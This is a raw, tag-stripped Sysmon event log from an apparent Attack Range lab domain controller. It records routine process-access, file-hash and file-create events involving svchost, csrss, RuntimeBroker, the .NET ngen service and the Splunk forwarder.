21:06:47.447{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-A267-60D3-FF04-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.432{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A267-60D3-FF04-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.432{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A267-60D3-FF04-00000000CF01}5364C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000022284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.369{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A961FB1D19BF2CE7E20B9002ED9D3071,SHA256=BCB94765EB890C3805C3B7779DA7799759A5ED81441517D1B197978CEC6C2E52,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.353{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C0BE70677C01B9F70F732EF40EED0F,SHA256=B6E08258F66E1449BCD9D6A4E275669EBB054F1FFA83584049B7F7A9096089FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.353{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC68F668E3263D0631AEE88A7B80DF96,SHA256=15606E7908F33A6CB490136D06CC7BBA1DC701923D4CCAA754E130A37CBFEA6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.338{4DB9351A-9DDD-60D3-0C00-00000000CF01}844884C:\Windows\system32\svchost.exe{4DB9351A-A267-60D3-FE04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.307{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A267-60D3-FE04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.307{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A267-60D3-FE04-00000000CF01}3420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.
NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:47.228{4DB9351A-A266-60D3-FD04-00000000CF01}5356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14ec-0\UIAutomationClient.dll2021-06-23 21:06:47.228 10341000x800000000000000022277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766184C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766184C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765744C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765252C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765744C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022266Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765252C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022265Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7766612C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000022264Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
